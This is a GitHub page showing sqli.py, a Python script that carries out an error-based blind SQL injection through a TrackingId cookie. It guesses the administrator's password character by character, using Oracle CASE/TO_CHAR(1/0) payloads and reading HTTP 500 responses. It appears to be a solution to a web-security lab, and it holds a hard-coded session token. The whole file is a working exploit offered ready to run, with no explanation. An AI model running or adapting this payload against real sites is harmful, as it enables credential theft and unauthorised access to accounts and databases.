-
Notifications
You must be signed in to change notification settings - Fork 1
/
sqli.py
56 lines (46 loc) · 1.97 KB
/
sqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import sys
import requests
import urllib3
import urllib.parse
import logging
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# Global variables
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
session_token = 'aE2b3VlLRZZ6ouE42cn88hTYownnZ72U'
def sqli_password(url):
password_extracted = ""
for i in range(1, 21):
for j in range(32, 126):
try:
sqli_payload = "' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and ascii(substr(password,%s,1))='%s') || '" % (i, j)
sqli_payload_encode = urllib.parse.quote(sqli_payload)
cookies = {'TrackingId': 'Y4FYVjo3U13O8bgR' + sqli_payload_encode, 'session': session_token}
r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)
if r.status_code == 500:
password_extracted += chr(j)
sys.stdout.write('\r' + password_extracted)
sys.stdout.flush()
break
else:
sys.stdout.write('\r' + password_extracted + chr(j))
sys.stdout.flush()
except requests.RequestException as e:
logger.error(f"Request failed: {e}")
continue
except Exception as e:
logger.error(f"Error occurred: {e}")
continue
def main():
if len(sys.argv) != 2:
print("(+) Usage: %s <url>" % sys.argv[0])
print("(+) Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
url = sys.argv[1]
logger.info("(+) Retrieving administrator password...")
sqli_password(url)
if __name__ == "__main__":
main()